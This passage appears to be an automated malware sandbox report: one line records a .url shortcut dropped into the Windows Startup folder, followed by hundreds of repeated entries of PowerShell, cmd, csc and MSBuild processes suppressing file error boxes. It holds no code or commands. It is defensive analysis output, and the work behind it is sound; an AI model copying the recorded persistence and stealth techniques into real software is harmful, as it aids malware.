File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
